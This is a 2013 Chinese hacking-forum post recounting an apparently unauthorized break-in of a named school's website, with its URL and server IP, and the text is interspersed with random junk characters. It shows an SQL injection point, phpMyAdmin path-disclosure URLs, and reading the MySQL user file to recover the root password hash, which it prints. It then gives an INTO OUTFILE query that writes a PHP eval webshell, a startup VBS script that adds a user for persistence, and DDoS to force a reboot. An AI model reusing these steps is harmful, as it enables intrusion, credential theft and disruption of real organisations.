中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ m# Y9 D' i6 |" |# ^5 y
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!4 d) N  \' {. Y  ]0 j7 p
2 [  g+ A3 g* G: b; q7 M
4 g" i4 d& ~5 b2 K+ e

  B) H3 |1 F. `$ s* c- \常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
: o  q# o, c8 ~& i. o4 |4 G: W! M& [# Z, H$ I; F
那么想可以直接写入shell ,getshell有几个条件:$ s3 U7 [! i$ C* h5 o5 T8 A) u
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
; s+ `6 Z6 [2 t( a. q
. B; V# z3 n' ?试着爆绝对路径:7 j5 M, h0 S9 n1 Y% @, B; W( o9 v, O
1./phpMyAdmin/index.php?lang[]=1  / K9 k4 a/ C# `& U3 ]9 M- o
2./phpMyAdmin/phpinfo.php  " d4 m0 P' }' s6 u
3./load_file()  
! d- T5 E$ t7 }2 X* d) z2 j4./phpmyadmin/themes/darkblue_orange/layout.inc.php  / t# o) u# O! N3 j6 G# H, J
5./phpmyadmin/libraries/select_lang.lib.php  9 u) y% S, x4 x1 B! y  p! z& y
6./phpmyadmin/libraries/lect_lang.lib.php  
4 R( x  c# {2 i5 ?2 N7./phpmyadmin/libraries/mcrypt.lib.php   
. e/ s( K8 z% a3 [( \1 a& ]- W8./phpmyadmin/libraries/export/xls.php  ; B8 q9 T2 O( K# `6 h5 P

: c7 C: b% q5 h% @- q/ c& X均不行...........................7 N$ B' X+ O0 E7 [% Q( j0 u

# {5 Y0 y7 p: X$ X8 b3 {( x御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
: A+ o4 E) m! V- o) M' w$ P" o2 A; [+ I3 G9 N, Z# c( g% R: y4 D
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin + T6 P7 p- F! O( U6 M

3 _: {5 c' x, P默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
( p5 l$ ]) @2 p9 h
" E. v. f1 j7 z敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........7 \3 y8 A) s4 Y- m" L9 ?) Y2 p
/ M/ X* r# l1 k
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 1 {# P# x" F* \

1 f/ U' R  M! z9 r+ D9 ]4 A1 Bhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
. v3 t+ I2 `. k7 X) q) {. }1 M; T) ?; w; o
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD / t$ b3 R0 G( a' d3 n3 @3 U1 F

& W2 a" S- K# p8 j, O5 Z4 O8 ]成功读到root密码:7 x. E4 J7 e  }+ ]) W/ x" x
+ o' K1 V% V# ]) f! }3 w
17---- r(0072)
3 T6 l; J  d, m% d$ O8 s3 ^18---- o(006f)9 g/ i/ E7 }. g/ s
19---- o(006f)
' X9 g8 Q9 \1 E$ t& H. E- Q& ?7 l20---- t(0074)7 f! m! ]& t9 O% h; r2 b0 o
21---- *(002a)$ {7 R/ d% \7 b' |( K2 C
22---- 8(0038)
) T! E' {8 {& x6 m  d23---- 2(0032)
* x. m5 F6 \( O- e% b' |  M24---- E(0045)
7 C  r& u) J$ v2 i& E9 F25---- 1(0031). L) d( ]) U4 c9 Q" N, a
26---- C(0043)
! R% d! [, u! O& H' I( Z: a* g27---- 5(0035)) i6 n7 p& x' e2 V6 w
28---- 8(0038), i' X1 @) ]# x; Z5 C
29---- 2(0032)2 a3 L7 x" G* `3 `8 x9 F
30---- 8(0038)
2 {0 ]2 e. |+ t, Y4 m" g31---- A(0041)0 z* m8 M  z4 K2 k1 Q$ ?, k8 {
32---- 9(0039)1 v* t( S2 d* @
33---- B(0042)% i7 H0 z. U/ n& D$ O
34---- 5(0035)
$ l% j  }% s+ I  C( \: `0 }0 `  k% S35---- 4(0034): S$ q% ^9 [# G9 [2 h- ]9 A
36---- 8(0038)7 O/ C. w. Z% x/ B
37---- 6(0036)1 A( g5 i( z+ M
38---- 4(0034)
& ]1 G8 o2 Y" J0 v# z7 j39---- 9(0039)
+ g. t9 @( o" z$ X8 T/ I6 n40---- 1(0031)
1 X! y2 [8 F8 W/ F9 [! G* {& Y41---- 1(0031)
  S4 b8 S1 @1 ?( K4 W42---- 5(0035)
% ?- p# \# F: }43---- 3(0033)0 C8 s5 V9 L. c, @- ^9 e
44---- 5(0035): r0 {9 F: T, n" m
45---- 9(0039)
/ P9 B. L# [+ P. I46---- 8(0038)) W/ V( F/ v" W
47---- F(0046)2 X' J: {8 {- W9 S( V) `+ Z
48---- F(0046)9 T- L0 P3 T. l, R
49---- 4(0034)
4 [* h& t! X' t9 B5 t50---- F(0046)7 s$ c' R* Q. S0 O; ~+ n+ C* w
51---- 0(0030)0 L3 I1 _7 Z: Y& Q( y. V  P
52---- 3(0033)
: ^* u6 i% }- h. {1 r53---- 2(0032)5 g! B: G9 |5 M: n/ K2 R
54---- A(0041)! d' A7 d0 l& Q; ^
55---- 4(0034)
# t: A2 v3 H, d) O7 z- w, y56---- A(0041)$ N7 }0 J  g$ u- ~- @
57---- B(0042)/ F8 S" @# g/ A# D$ K3 H5 Z
58---- *(0044)
4 \. J9 F. _5 c% U2 K59---- *(0035)
7 G# _# c) N9 P: n# `3 q4 O60---- *(0041)9 `# y& G* w! ?( T. k5 Z/ [4 M/ S
61---- *0032); [5 t: h) f$ ]) }
' V6 K9 K: R% w" s
解密后成功登陆phpmyamin$ d9 T) V  n! C0 s8 ^
                          
. D5 w- u! J- E# H, x4 y: u
1 ?' ~8 Z! i3 k# z  k  P  n                             [attach]164[/attach]4 n. T& b6 n4 V
) n8 j* L; Z) K7 b' _
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php': f- X9 ^7 j. X! e% z4 v4 W; a

+ N1 r/ Q+ F* b; F% g成功执行,拿下shell,菜刀连接:
* X4 V. ?1 M6 l/ l4 R5 k7 u, m1 H
/ k" K: |: Y$ q  Z0 ?$ ?服务器不支持asp,aspx,php提权无果...................9 O- J- g; l4 H, `3 }7 P; V3 `

! q3 h' c( c# i( ?4 d$ M% I但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:) M( G. y) V1 f+ O4 I1 z* _" g$ I+ d9 I
服务器上已经有个隐藏帐号了

1 d. o$ g4 L, R" R
别名     administrators
$ }# i* |/ k2 {1 @# ?注释     管理员对计算机/域有不受限制的完全访问权
) N8 g! a4 |- t( n' r6 T$ P# U  |0 x
成员

5 D2 m2 j6 G- [9 `4 [3 l/ D* Y
-------------------------------------------------------------------------------
# G! R$ W& q6 W% m1 Q" U$ vadmin- P" R: S+ I5 G; A5 \
Administrator
: {" }: l3 _) Nslipper$
( [/ C6 b  _7 u( Fsqluser+ p( d4 r% t6 q9 n1 J
命令成功完成。
2 R% e0 j7 i' t+ H& H
+ z: [: P7 i, V服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。% C0 N; s7 C' k$ L" e5 s

: p0 L, R4 i3 u. ^0 Q6 q* |ddos服务器重启,不然就只能坐等服务器重启了...............................
4 O1 X: d! j5 A1 s$ U& U' k! e: r$ l' K
      
6 D6 d1 S2 F+ @1 J5 V0 I

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2